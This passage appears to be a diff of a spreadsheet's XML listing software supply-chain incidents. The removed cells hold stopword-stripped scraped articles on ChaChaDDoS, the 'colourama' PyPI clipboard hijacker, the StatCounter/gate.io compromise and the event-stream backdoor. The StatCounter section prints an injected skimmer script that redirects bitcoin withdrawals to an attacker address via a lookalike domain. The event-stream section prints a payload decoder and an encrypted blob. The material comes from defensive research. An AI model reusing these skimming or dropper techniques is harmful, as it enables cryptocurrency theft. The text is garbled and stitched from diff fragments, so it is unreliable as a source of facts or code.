different samples analysed observed similar characteristics concerning structure port addresses used belong subnet as25092 opatelecom tetyana mysyk ukraine resource name second stage looks pseudorandom always 6to8 character uppercase string jhkdsag asdfre follows patter httpcc8852campaignarch found second stage binaries available multiple architectures including mips powerpc even s390x downloading file corresponding architecture victim host decrypted chacha encryption algorithm chacha successor salsa20 stream cipher ciphers constant expand 32byte initial state following image shows beginning decryption function differences algorithms rearrangement initial state modification quarterround core operation performed ciphers thanks specific rotations used quarterround could identify chacha shown following snippet size used chacha decryption bits among samples collected observed order avoid pain reimplementing decryption algorithm developed script based miasm emulate decryption function decrypted second stage appeared output lzma compressed extracted binary using lzma output secondstageelf second stage binary much larger first stage mainly embedded interpreter malware something seen linuxshishiga purpose second stage execute hardcoded payload downloads tasks periodically consider task third stage task basically code interpreted variants observed second stage uses server first stage second stage embeds numerous libraries luasocket communicate hardcoded server native functions binary exposed called code following screenshot shows exported like chacha encryption function example task downloaded payload chacha decrypted different encryption executed interpreter second stage used download task seems follow specific pattern observe following snippet code also payload send statistics using specified screenshot regarding task usage however practice sends address information third stage tasks tasks able collect observed implementation ddos function code pretty explicit consists mainly call function perform ddos attack given target address ddos target belongs chinese couldn’t find obvious reason address target ddos attack services seem hosted address lastmodified http response header task file response indicates target since september 24th reliable since malware ifmodifiedsince http request header avoid downloading payloads asdfrem campaign active task similar targets another address china conclusion it’s obvious chachaddos shares code xorddos persistence mechanism author chachaddos authors simply steal chachaddos attention caught vestacp instances existence binaries multiple architectures suggests devices including embedded devices targeted incident also reminder software open source necessarily safe malware still make malicious credentialstealing code right everyone github multiple months spotted agree help find vulnerabilities postmortem case doesn’t mean blindly trust product simply basis open source eset products detect linuxxorddosq linuxxorddosr linuxchachaddos thanks hugo porcher help analysis writeup indicators compromise iocs first stage hash sha1 eset detection name arch second stage urls bd5d0093bba318a77fd4e24b34ced85348e43960 linuxxorddosq x8664 hxxp1932012242388852rtegfn01 0413f832d8161187172aef7a769586515f969479 linuxxorddosr x8664 hxxpzxcvbmnnfjjfwqcom8852rtegfn01 hxxpefbthmoiuykmkjkjgtcom8852rtegfn01 0328fa49058e7c5a63b836026925385aac76b221 linuxchachaddosb mips hxxp9fdmasaxsssaqrkcom8852ytrfda hxxp10afdmasaxsssaqrkcom8852ytrfda 334ad99a11a0c9dd29171a81821be7e3f3848305 linuxchachaddosb mips hxxp1932012242388852daaadf 4e46630b98f0a920cf983a3d3833f2ed44fa4751 linuxchachaddosb hxxp1932012242338852daaadf 3caf7036aa2de31e296beae40f47e082a96254cc linuxchachaddosb mips hxxp8masaxsssaqrkcom8852jhkdsag hxxp7mfsdfasdmkgmrkcom8852jhkdsag 0ab55b573703e20ac99492e5954c1db91b83aa55 linuxchachaddosb hxxp1932012242028852asdfrem hxxp1932012242028852asdfre chacha fa408855304ca199f680b494b69ef473dd9c5a5e0e78baa444048b82a8bd97a9 second stage hash sha1 eset detection name arch second stage urls 1b6a8ab3337fc811e790593aa059bc41710f3651 linuxchachaddosa powerpc64 hxxp1932012242388852rtegfn01rtegfn01dat 4ca3b06c76f369565689e1d6bd2ffb3cc952925d linuxchachaddosa hxxp1932012242388852rtegfn01rtegfn01dat 6a536b3d58f16bbf4333da7af492289a30709e77 linuxchachaddosa powerpc hxxp1932012242388852rtegfn01rtegfn01dat 72651454d59c2d9e0afdd927ab6eb5aea18879ce linuxchachaddosa i486 hxxp1932012242388852rtegfn01rtegfn01dat a42e131efc5697a7db70fc5f166bae8dfb3afde2 linuxchachaddosa s390x hxxp1932012242388852rtegfn01rtegfn01dat abea9166dad7febce8995215f09794f6b71da83b linuxchachaddosa arm64 hxxp1932012242388852rtegfn01rtegfn01dat bb999f0096ba495889171ad2d5388f36a18125f4 linuxchachaddosa x8664 hxxp1932012242388852rtegfn01rtegfn01dat d3af11dbfc5f03fd9c10ac73ec4a1cfb791e8225 linuxchachaddosa mips64 hxxp1932012242388852rtegfn01rtegfn01dat d7109d4dfb862eb9f924d88a3af9727e4d21fd66 linuxchachaddosa mips hxxp1932012242388852rtegfn01rtegfn01dat 56ac7c2c89350924e55ea89a1d9119a42902596e linuxchachaddosa mips hxxp1932012242388852daaadfdaaadfdat chacha 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f references httpblogmalwaremustdieorg201409mmd00282014fuzzyreversingnewchinahtml httpswwwfireeyecomblogthreatresearch201502anatomyofabrutefhtml httpsotxalienvaultcomindicatorfile0177aa7826f5239cb53613cc90e247b710800ddf httpsforumvestacpcomviewtopicphpf10t16556 httpscarolinafernandezgithubiosecurity20150316iptablexxorddos httpsblogcheckpointcomhttpswebassetsesetstaticcomwls201510sbreportthreatintelligencegroundhogpdf httpsgrehackfrdata2017slidesgrehack17downtherabbitholehowhackersexploitweaksshcredentialstobuildddosbotnetspdf keep date sign newsletters ukraine crisis newsletter regular weekly newsletter subscribe related articles critical infrastructure malware black cyberwar fireandforgetmenot critical infrastructure malware black cyberwar fireandforgetmenot malware chatgpt start writing killer malware malware chatgpt start writing killer malware malware emotet changing tactics response microsoft’s tightening office macro malware emotet changing tactics response microsoft’s tightening office macro share article discussion awardwinning news views insight eset community eset contact privacy policy legal information manage cookies feed copyright eset rights reserved</t>
+          <t>An unknown hacker injected credential logging and exfiltration code into VestaCP installation scripts.</t>
         </is>
       </c>
       <c r="D85" t="inlineStr">
         <is>
           <t>https://www.welivesecurity.com/2018/10/18/new-linux-chachaddos-malware-distributed-servers-vestacp-installed/</t>
-        </is>
-      </c>
-      <c r="E85" t="inlineStr">
-        <is>
-          <t>['news', 'view', 'insight', 'advice', 'business', 'research', 'blogpost', 'podcast', 'white', 'paper', 'report', 'crisis', 'digital', 'resource', 'center', 'live', 'progress', 'covid19', 'resource', 'video', 'digital', 'cybercrime', 'online', 'social', 'medium', 'internet', 'thing', 'malware', 'ransomware', 'mobile', 'critical', 'infrastructure', 'research', 'welivesecurity', 'expert', 'contact', 'news', 'view', 'insight', 'supplychain', 'attack', 'customer', 'admin', 'credential', 'server', 'recent', 'month', 'numerous', 'user', 'panel', 'solution', 'warning', 'service', 'provider', 'server', 'abnormal', 'amount', 'bandwidth', 'server', 'fact', 'launch', 'ddo', 'attack', 'analysis', 'server', 'malware', 'system', 'time', 'week', 'official', 'distribution', 'supplychain', 'attack', 'installation', 'least', 'similarity', 'linuxxorddo', 'xorddo', 'old', 'family', 'multiple', 'stage', 'second', 'thirdstage', 'component', 'infection', 'vector', 'user', 'attacker', 'linuxchachaddo', 'clear', 'payload', 'vartmp', 'ectory', 'attacker', 'admin', 'password', 'trivial', 'task', 'installation', 'user', 'privilege', 'password', 'user', 'multiple', 'hypothesis', 'credential', 'first', 'place', 'vulnerability', 'interface', 'unencrypted', 'password', 'content', 'file', 'attacker', 'local', 'file', 'inclusion', 'privilege', 'escalation', 'vulnerability', 'user', 'falzo', 'code', 'interesting', 'version', 'installation', 'script', 'admin', 'password', 'server', 'name', 'official', 'website', 'file', 'codename', 'variable', 'password', 'server', 'domain', 'name', 'httpvestacpcomnotify', 'falzo', 'hack', 'line', 'debian', 'installer', 'ubuntu', 'installer', 'reference', 'history', 'visible', 'major', 'password', 'administrator', 'admin', 'password', 'harden', 'access', 'server', 'serious', 'admin', 'shocking', 'evidence', 'password', 'leakage', 'linuxchachaddo', 'first', 'place', 'hole', 'malicious', 'code', 'tree', 'unclear', 'perpetrator', 'installation', 'script', 'server', 'version', 'next', 'version', 'file', 'ubuntu', 'target', 'least', 'analysis', 'malware', 'server', 'variant', 'strain', 'ddo', 'malware', 'call', 'chachaddo', 'evolution', 'multiple', 'ddo', 'malware', 'first', 'second', 'stage', 'kworker11', 'output', 'first', 'stage', 'persistence', 'mechanism', 'link', 'xorddo', 'persistence', 'mechanism', 'linuxchachaddo', 'linuxxorddo', 'filename', 'step', 'copy', 'usrbindhcprenew', 'persistence', 'mechanism', 'malware', 'host', 'service', 'description', 'info', 'dhcprenew', 'case', 'usrbindhcprenew', 'stop', 'symlink', 'service', 'command', 'default', 'service', 'download', 'decryption', 'second', 'stage', 'persistence', 'second', 'stage', 'different', 'sample', 'similar', 'characteristic', 'structure', 'port', 'address', 'subnet', 'resource', 'name', 'second', 'stage', 'pseudorandom', 'character', 'patter', 'second', 'stage', 'binary', 'available', 'multiple', 'architecture', 'file', 'architecture', 'victim', 'host', 'chacha', 'encryption', 'salsa20', 'stream', 'cipher', 'constant', 'initial', 'state', 'image', 'show', 'decryption', 'function', 'difference', 'algorithm', 'rearrangement', 'initial', 'state', 'modification', 'quarterround', 'core', 'operation', 'cipher', 'thank', 'specific', 'rotation', 'chacha', 'snippet', 'size', 'chacha', 'decryption', 'bit', 'sample', 'observed', 'order', 'pain', 'decryption', 'algorithm', 'script', 'miasm', 'decryption', 'function', 'second', 'stage', 'output', 'binary', 'output', 'second', 'stage', 'binary', 'large', 'first', 'stage', 'interpreter', 'malware', 'purpose', 'second', 'stage', 'payload', 'task', 'task', 'third', 'stage', 'task', 'code', 'variant', 'second', 'stage', 'server', 'first', 'stage', 'second', 'stage', 'numerous', 'library', 'luasocket', 'communicate', 'server', 'native', 'function', 'code', 'screenshot', 'show', 'chacha', 'encryption', 'function', 'example', 'task', 'payload', 'chacha', 'different', 'encryption', 'interpreter', 'second', 'stage', 'download', 'task', 'specific', 'pattern', 'payload', 'statistic', 'screenshot', 'task', 'usage', 'practice', 'address', 'information', 'third', 'stage', 'task', 'task', 'able', 'implementation', 'ddo', 'function', 'code', 'explicit', 'consist', 'function', 'ddo', 'attack', 'target', 'address', 'ddo', 'target', 'obvious', 'reason', 'address', 'target', 'ddo', 'attack', 'service', 'address', 'http', 'response', 'header', 'task', 'file', 'response', 'target', '24th', 'reliable', 'request', 'header', 'payload', 'asdfrem', 'active', 'task', 'similar', 'target', 'address', 'conclusion', 'obvious', 'chachaddo', 'share', 'xorddo', 'persistence', 'mechanism', 'author', 'author', 'chachaddo', 'attention', 'instance', 'binary', 'multiple', 'architecture', 'device', 'device', 'incident', 'software', 'open', 'source', 'safe', 'malware', 'malicious', 'credentialstealing', 'code', 'multiple', 'month', 'help', 'vulnerability', 'postmortem', 'case', 'product', 'open', 'source', 'eset', 'product', 'analysis', 'writeup', 'indicator', 'first', 'stage', 'detection', 'name', 'arch', 'second', 'stage', 'url', 'linuxxorddosq', 'chacha', 'fa408855304ca199f680b494b69ef473dd9c5a5e0e78baa444048b82a8bd97a9', 'second', 'stage', 'detection', 'name', 'arch', 'second', 'stage', 'url', 'reference', 'date', 'newsletter', 'regular', 'weekly', 'newsletter', 'subscribe', 'related', 'article', 'critical', 'infrastructure', 'malware', 'black', 'cyberwar', 'fireandforgetmenot', 'critical', 'infrastructure', 'malware', 'black', 'fireandforgetmenot', 'killer', 'killer', 'tactic', 'office', 'macro', 'tactic', 'office', 'macro', 'share', 'discussion', 'news', 'view', 'insight', 'privacy', 'policy', 'legal', 'information', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -2660,17 +2327,12 @@
       </c>
       <c r="C86" t="inlineStr">
         <is>
-          <t>open sign sign write sign sign cryptocurrency clipboard hijacker discovered pypi repository bertus follow read listen share you’ve ever installed pypi package named ‘colourama’ probably want read mentioned previous blog post detecting cyber attacks pypi last year research automated detection malicious code pypi repository initial scan pypi repository earlier year detected eleven malicious packages reported pypi maintainers privately since i’ve continued improvements detection tool recently rescanned pypi repository analyzing data rescan discovered interesting pypi package named ‘colourama’ package typosquatting popular pypi package named ‘colorama’ ‘colourama’ package contains malware dropper targets windows machines downloads second stage implements cryptocurrency clipboard hijacker written vbscript vbscript executes creates script adds windows registry entry execute whenever user logs machine script runs background checks windows clipboard every script detects anything clipboard resembles bitcoin address replaces bitcoin address control attacker means time user machine attempts someone bitcoins copying bitcoin address email website replaced attacker’s bitcoin address details colourama package ‘colourama’ package pypi since december author seems copied colorama code added special installer code malware dropper according pypistatsorg downloaded times last month package reported pypi administrators recommendations would good idea uninstall ‘colourama’ package however stop remove malicious vbscript ‘colourama’ package downloads installs malicious vbscript installation never uninstalls based analysis code fully remove malware following done however responsibility safely delete files registry entries diligence based specific delete vbscript installed programdata microsoft essentialssoftware essentialsvbs” delete “microsoft software essentials” registry entry “hkeycurrentusersoftwaremicrosoftwindowscurrentversionrun” stop associated process likely show ‘wscript’ process list alternatively restart machine detailed analysis malicious code setuppy file ‘colourama’ package contains following class called part package install request ‘hxxpsgrabifylinke09eif’ seems like used tracking installs package since redirects tacobell’s website response data used code using grabifylink gives actor ability track amount installs installed address package installed large base64 encoded string redacted code snippet brevity decoded executed python code code contained base64 encoded string shown malicious code first checks running windows system attempts download vbscript hastebin fails tries download pastebin base64 encoded github base64 encoded strings used obfuscate urls first tryexcept block code appears diversion doesn’t anything useful generating exception code enters second tryexcept block request made hastebin response written file executed vbscript downloaded hastebin shown script creates persistence registry entry creates script executes script also start every time user machine monitor windows clipboard bitcoin addresses replace bitcoin address actor’s choice python pypi typo squatting follow written bertus followers software engineering follow help status careers blog privacy terms text speech teams</t>
+          <t xml:space="preserve">The colourama package is typo-squatting the popular PyPI package named colorama. The colourama package contains a malware dropper which targets Windows machines and downloads a second stage that implements a cryptocurrency clipboard hijacker written in VBScript. </t>
         </is>
       </c>
       <c r="D86" t="inlineStr">
         <is>
           <t>https://medium.com/@bertusk/cryptocurrency-clipboard-hijacker-discovered-in-pypi-repository-b66b8a534a8</t>
-        </is>
-      </c>
-      <c r="E86" t="inlineStr">
-        <is>
-          <t>['open', 'sign', 'sign', 'sign', 'sign', 'cryptocurrency', 'clipboard', 'hijacker', 'listen', 'share', 'pypi', 'package', 'colourama', 'previous', 'blog', 'post', 'cyber', 'attack', 'last', 'year', 'research', 'detection', 'malicious', 'code', 'year', 'malicious', 'package', 'pypi', 'improvement', 'detection', 'tool', 'datum', 'interesting', 'pypi', 'package', 'colourama', 'package', 'popular', 'pypi', 'package', 'colourama', 'package', 'malware', 'dropper', 'target', 'window', 'machine', 'second', 'stage', 'cryptocurrency', 'clipboard', 'hijacker', 'script', 'registry', 'execute', 'user', 'log', 'machine', 'script', 'background', 'check', 'clipboard', 'script', 'clipboard', 'bitcoin', 'address', 'bitcoin', 'address', 'control', 'time', 'user', 'machine', 'bitcoin', 'bitcoin', 'address', 'email', 'website', 'attacker', 'bitcoin', 'address', 'colourama', 'package', 'colourama', 'package', 'pypi', 'author', 'special', 'installer', 'code', 'malware', 'dropper', 'time', 'last', 'month', 'package', 'recommendation', 'good', 'idea', 'uninstall', 'colourama', 'package', 'malicious', 'vbscript', 'colourama', 'package', 'download', 'malicious', 'vbscript', 'installation', 'analysis', 'code', 'malware', 'responsibility', 'file', 'registry', 'entry', 'diligence', 'specific', 'delete', 'software', 'essential', 'registry', 'entry', 'hkeycurrentusersoftwaremicrosoftwindowscurrentversionrun', 'stop', 'associated', 'process', 'wscript', 'process', 'list', 'machine', 'analysis', 'malicious', 'code', 'setuppy', 'file', 'colourama', 'package', 'class', 'part', 'package', 'install', 'request', 'tracking', 'install', 'package', 'redirect', 'website', 'response', 'datum', 'code', 'grabifylink', 'actor', 'ability', 'track', 'amount', 'address', 'package', 'large', 'base64', 'string', 'code', 'snippet', 'brevity', 'code', 'code', 'base64', 'string', 'malicious', 'code', 'first', 'check', 'window', 'system', 'attempt', 'download', 'try', 'pastebin', 'base64', 'base64', 'string', 'url', 'first', 'tryexcept', 'block', 'diversion', 'useful', 'generating', 'exception', 'code', 'second', 'tryexcept', 'block', 'request', 'hastebin', 'response', 'file', 'script', 'persistence', 'registry', 'entry', 'script', 'execute', 'script', 'time', 'user', 'bitcoin', 'address', 'bitcoin', 'address', 'actor', 'choice', 'python', 'follow', 'software', 'engineering', 'follow', 'help', 'status', 'career', 'blog', 'privacy', 'term', 'text', 'speech', 'team']</t>
         </is>
       </c>
     </row>
@@ -2687,17 +2349,12 @@
       </c>
       <c r="C87" t="inlineStr">
         <is>
-          <t>awardwinning news views insight eset community english español deutsch português français tips advice business eset research eset research blogposts podcasts white papers reports featured ukraine crisis digital resource center live progress covid19 resources videos topics digital scams privacy cybercrime kids online social media internet things malware ransomware secure coding mobile critical infrastructure research welivesecurity experts contact english español deutsch português français awardwinning news views insight eset community eset research supplychain attack cryptocurrency exchange gateio latest eset research shows attackers order steal bitcoin customers specific virtual currency exchange matthieu faou read update wednesday november november statcounter removed malicious script several hours gateio stopped using statcounter analytics services prevent infections thus incident resolved websites browsed safely november attackers successfully breached statcounter leading analytics platform service used many webmasters gather statistics visitors service similar google analytics webmasters usually external javascript incorporating piece code statcounter wwwstatcountercomcountercounterjs webpage thus compromising statcounter platform attackers inject javascript code websites statcounter according website statcounter million member sites computes stats billion page views month information line alexa rank comparison official website debian linux distribution debianorg similar alexa rank attackers modified script wwwstatcountercomcountercounterjs adding piece malicious code shown “prettified” form middle script unusual attackers generally malicious code beginning legitimate file code injected middle existing script typically harder detect casual observation evalfunctionp functionc return ctostringa replace string functione return function return preplacenew regexpb return 3245367891a 02bd0efghicj0klm2nop0 gadocumentmyselfloclocationifindexofmyaccountwithdrawbtcvarcreateelementscriptsrchttpswwwstatconutercomphpsetattributeasynctruedocumentelementfirstchildappendchildsplit script packed dean edwards packer probably popular javascript packer however trivially unpacked resulting actual script code seen myselfloc documentlocation myselflocindexofmyaccountwithdrawbtc documentcreateelementscript gasrc httpswwwstatconutercomcphp gasetattributeasync true documentdocumentelementfirstchildappendchildga piece code first check contains myaccountwithdrawbtc thus already guess attackers’ goal target bitcoin platform check passes script continues script element webpage incorporating code httpswwwstatconutercomcphp notice attackers registered domain similar legitimate statcounter statcountercom switched letters hard notice scanning logs unusual activity interestingly checking passive domain noticed domain already suspended abuse explained script targets specific uniform resource identifier myaccountwithdrawbtc turns among different cryptocurrency exchanges live time writing gateio valid page thus exchange seems main target attack exchange quite popular alexa rank even china also according coinmarketcapcom several million dollars including million bitcoin transactions transit platform every thus could profitable attackers steal cryptocurrency large scale platform webpage httpswwwgateiomyaccountwithdrawbtc shown used transfer bitcoin gateio account external bitcoin address perhaps unsurprisingly turns second stage payload statconutercomcphp designed steal bitcoins thus makes sense inject script gateio bitcoin transfer webpage script also packed dean edwards packer unpacked version shown documentforms0addrvalue documentforms0amountvalue dosubmit1 dosubmit dosubmit function documentgetelementbyidwithdrawform amountval documentforms0addrname input typehidden nameaddr sattrvalue 1jrflmgvk1ho1ucmpq1wyirhptccyr2jad withdrawform bappends asubmit else documentgetelementbyidcanuseinnertext documentforms0addrname input typehidden nameaddr sattrvalue 1jrflmgvk1ho1ucmpq1wyirhptccyr2jad withdrawform bappends documentforms0amountname input typehidden nameamount tattrvalue mathmindocumentgetelementbyidcanuseinnertext documentgetelementbyiddaylimitinnertext bappendt asubmit else dosubmit1 genuine gateio webpage already dosubmit function called user clicks submit button attackers redefine script automatically replaces destination bitcoin address address belonging attackers example 1jrflmgvk1ho1ucmpq1wyirhptccyr2jad malicious server generates bitcoin address time visitor loads statconutercomcphp script thus hard many bitcoins transferred attackers depending whether victim enters amount attackers’ script either victim’s account’s daily withdrawal limit test account withdrawal limit default finally malicious script submits form executes transfer victim’s account attackers’ wallet redirection probably unnoticeable victims since replacement performed click submit button thus happen quickly would probably even displayed bitcoin address generated time malicious script sent victim able many bitcoins attackers gathered instance check address received test machine balance conclusion even know many bitcoins stolen attack shows attackers target specific website particular cryptocurrency exchange achieve compromised analytics service’s website used million websites including several governmentrelated websites steal bitcoin customers cryptocurrency exchange website also shows even website updated well protected still vulnerable weakest link case external resource another reminder external javascript code control third party modified time without notice notified statcounter gateio soon discovered malicious activity inquiries make sample submissions related subject please contact threatintelesetcom indicators compromise malicious urls statcountercomcountercounterjs statconutercomcphp keep date sign newsletters ukraine crisis newsletter regular weekly newsletter subscribe related articles eset research rescoms rides waves acecryptor spam eset research rescoms rides waves acecryptor spam eset research evasive panda leverages monlam festival target tibetans eset research evasive panda leverages monlam festival target tibetans eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context eset research ukraine crisis digital resource center operation texonto information operation targeting ukrainian speakers context share article discussion awardwinning news views insight eset community eset contact privacy policy legal information manage cookies feed copyright eset rights reserved</t>
+          <t>StatCounter was compromised, and a cryptocurrency stealing script for gate.io was added to a JavaScript resource used by StatCounter customers.</t>
         </is>
       </c>
       <c r="D87" t="inlineStr">
         <is>
           <t>https://www.welivesecurity.com/2018/11/06/supply-chain-attack-cryptocurrency-exchange-gate-io/</t>
-        </is>
-      </c>
-      <c r="E87" t="inlineStr">
-        <is>
-          <t>['news', 'view', 'insight', 'advice', 'business', 'research', 'blogpost', 'podcast', 'white', 'paper', 'report', 'crisis', 'digital', 'resource', 'center', 'live', 'progress', 'covid19', 'resource', 'video', 'digital', 'cybercrime', 'online', 'social', 'medium', 'internet', 'thing', 'malware', 'ransomware', 'mobile', 'critical', 'infrastructure', 'research', 'welivesecurity', 'expert', 'contact', 'news', 'view', 'insight', 'supplychain', 'attack', 'cryptocurrency', 'exchange', 'late', 'eset', 'research', 'attacker', 'order', 'bitcoin', 'customer', 'specific', 'virtual', 'currency', 'exchange', 'statcounter', 'malicious', 'script', 'several', 'hour', 'statcounter', 'analytic', 'service', 'infection', 'incident', 'website', 'attacker', 'statcounter', 'analytic', 'platform', 'service', 'many', 'webmaster', 'statistic', 'visitor', 'similar', 'analytic', 'webmaster', 'external', 'javascript', 'piece', 'code', 'statcounter', 'webpage', 'statcounter', 'platform', 'attacker', 'javascript', 'code', 'website', 'statcounter', 'website', 'member', 'site', 'stat', 'page', 'view', 'month', 'information', 'line', 'alexa', 'rank', 'comparison', 'official', 'website', 'similar', 'alexa', 'rank', 'attacker', 'script', 'piece', 'malicious', 'code', 'form', 'middle', 'script', 'unusual', 'attacker', 'malicious', 'code', 'legitimate', 'file', 'code', 'middle', 'script', 'casual', 'observation', 'evalfunctionp', 'ctostringa', 'string', 'functione', 'return', 'function', 'return', '3245367891a', 'gadocumentmyselfloclocationifindexofmyaccountwithdrawbtcvarcreateelementscriptsrchttpswwwstatconutercomphpsetattributeasynctruedocumentelementfirstchildappendchildsplit', 'script', 'popular', 'javascript', 'packer', 'unpacked', 'actual', 'script', 'code', 'myselfloc', 'documentlocation', 'true', 'piece', 'code', 'first', 'check', 'attacker', 'goal', 'target', 'bitcoin', 'platform', 'check', 'pass', 'script', 'script', 'element', 'webpage', 'code', 'notice', 'attacker', 'domain', 'similar', 'legitimate', 'statcounter', 'statcountercom', 'letter', 'notice', 'unusual', 'activity', 'passive', 'domain', 'domain', 'abuse', 'script', 'specific', 'uniform', 'resource', 'identifi', 'different', 'cryptocurrency', 'exchange', 'time', 'valid', 'exchange', 'main', 'target', 'attack', 'exchange', 'popular', 'alexa', 'rank', 'several', 'dollar', 'bitcoin', 'transaction', 'transit', 'platform', 'profitable', 'attacker', 'cryptocurrency', 'large', 'scale', 'platform', 'webpage', 'transfer', 'bitcoin', 'account', 'external', 'bitcoin', 'address', 'second', 'stage', 'payload', 'steal', 'bitcoin', 'sense', 'inject', 'script', 'bitcoin', 'transfer', 'webpage', 'script', 'unpacked', 'version', 'withdrawform', 'bappend', 'withdrawform', 'bappend', 'documentgetelementbyiddaylimitinnertext', 'genuine', 'webpage', 'dosubmit', 'function', 'user', 'button', 'attacker', 'script', 'destination', 'bitcoin', 'address', 'address', 'attacker', 'malicious', 'server', 'bitcoin', 'address', 'time', 'script', 'many', 'bitcoin', 'attacker', 'victim', 'amount', 'attacker', 'script', 'victim', 'account', 'daily', 'withdrawal', 'limit', 'test', 'account', 'limit', 'default', 'malicious', 'script', 'form', 'execute', 'transfer', 'victim', 'account', 'attacker', 'wallet', 'redirection', 'unnoticeable', 'victim', 'replacement', 'submit', 'button', 'bitcoin', 'address', 'time', 'malicious', 'script', 'victim', 'able', 'many', 'bitcoin', 'attacker', 'instance', 'check', 'address', 'test', 'machine', 'balance', 'conclusion', 'many', 'bitcoin', 'attack', 'attacker', 'specific', 'website', 'particular', 'cryptocurrency', 'exchange', 'analytic', 'service', 'website', 'website', 'several', 'website', 'bitcoin', 'customer', 'cryptocurrency', 'exchange', 'website', 'website', 'vulnerable', 'weak', 'link', 'case', 'external', 'resource', 'reminder', 'external', 'javascript', 'code', 'control', 'party', 'time', 'notice', 'statcounter', 'malicious', 'activity', 'inquiry', 'sample', 'submission', 'subject', 'contact', 'threatintelesetcom', 'indicator', 'malicious', 'url', 'statcountercomcountercounterjs', 'keep', 'date', 'newsletter', 'regular', 'weekly', 'newsletter', 'subscribe', 'article', 'research', 'rescom', 'ride', 'wave', 'rescom', 'ride', 'wave', 'evasive', 'panda', 'leverage', 'research', 'evasive', 'panda', 'leverage', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'crisis', 'digital', 'resource', 'operation', 'ukrainian', 'speaker', 'context', 'share', 'article', 'discussion', 'news', 'view', 'insight', 'privacy', 'policy', 'legal', 'information', 'cookie', 'right']</t>
         </is>
       </c>
     </row>
@@ -2714,17 +2371,12 @@
       </c>
       <c r="C88" t="inlineStr">
         <is>
-          <t>browser longer supported please switch supported browser continue using twittercom list supported browsers help center help center terms service privacy policy cookie policy imprint info corp</t>
+          <t>13 apps containing adware are available for download in the Google Play Store.</t>
         </is>
       </c>
       <c r="D88" t="inlineStr">
         <is>
           <t>https://twitter.com/LukasStefanko/status/1064507886896844800</t>
-        </is>
-      </c>
-      <c r="E88" t="inlineStr">
-        <is>
-          <t>['browser', 'list', 'browser', 'center', 'center', 'term', 'service', 'privacy', 'policy', 'cookie', 'policy', 'imprint']</t>
         </is>
       </c>
     </row>
@@ -2741,17 +2393,12 @@
       </c>
       <c r="C89" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert repository archived owner readonly dominictarr eventstream public archive notifications fork star code issues pull requests actions projects wiki insights additional navigation options code issues pull requests actions projects wiki insights dont know closed fallingsnow opened issue comments fixed peerigonparsedomain57 closed dont know fallingsnow opened issue comments fixed peerigonparsedomain57 comments copy link fallingsnow commented edited edit affected using anything cryptocurrency related maybe discovered maths22 target seems identified copay related libraries executes successfully matching package assumed copay point using cryptocurrency related library flatmapstream011 running eventstream flatmapstream likely affected example eventstream flatmapstream flatmapstream011 users done good analysis payloads actually dont know comment dont know comment dont know comment time fixes deployed yanked malicious version ensure developers package using aware post developer update eventstream dependency eventstream334 protects people cached versions eventstream dominictarr right9ctrl given access repo added flatmapstream entirely commit repo versions latest removes injection unmaintained created months injection targeting pstree adds almost exact time injection added flatmapstream bumps version publishes literally second commit days later removes injection bumps major version clear repo flatmapstream still everyone millions weekly installs using affected right9ctrl removed flatmapstream realized injection attack didnt yank eventstream336 didnt know choose completely unusedunknown library downloads exact date flatmapstream011 published wouldnt asking questions included break flatmapstream includes portion code found unminified source flatmapstream011 found minified source code cleaned little better understanding worst part still dont even know decrypted data byte code something regular javascript maybe handling correctly require process function return bufferfromr hextostring function decode data return buffer data tostring re2e2f746573742f64617461 requiredecode2e2f746573742f64617461 requiretestdata 75d4c87f3f69e0fa292969072c49dff4f90f44c1385d8eb60dae4cc3a229e52cf61f78b0822353b4304e323ad563bc22c98421eb6a8c1917e30277f716452ee8d57f9838e00f0c4e4ebd7818653f00e72888a4031676d8e2a80ca3cb00a7396ae3d140135d97c6db00cab172cbf9a92d0b9fb0f73ff2ee4d38c7f6f4b30990f2c97ef39ae6ac6c828f5892dd8457ab530a519cd236ebd51e1703bcfca8f9441c2664903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959eab4707557b263ec74b2764033cd343199eeb6140a6284cb009a09b143dce784c2cd40dc320777deea6fbdf183f787fa7dd3ce2139999343b488a4f5bcf3743eecf0d30928727025ff3549808f7f711c9f7614148cf43c8aa7ce9b3fcc1cff4bb0df75cb2021d0f4afe5784fa80fed245ee3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e630888e5b6c3f2b8f8489cd6bc082c8063eb03dd665badaf2a020f1448f3ae268c8d176e1d80cc756dc3fa02204e7a2f74b9da97f95644792ee87f1471b4c0d735589fc58b5c98fb21c8a8db551b90ce60d88e3f756cc6c8c4094aeaa12b149463a612ea5ea5425e43f223eb8071d7b991cfdf4ed59a96ccbe5bdb373d8febd00f8c7effa57f06116d850c2d9892582724b3585f1d71de83d54797a0bfceeb4670982232800a9b695d824a7ada3d41e568ecaa6629 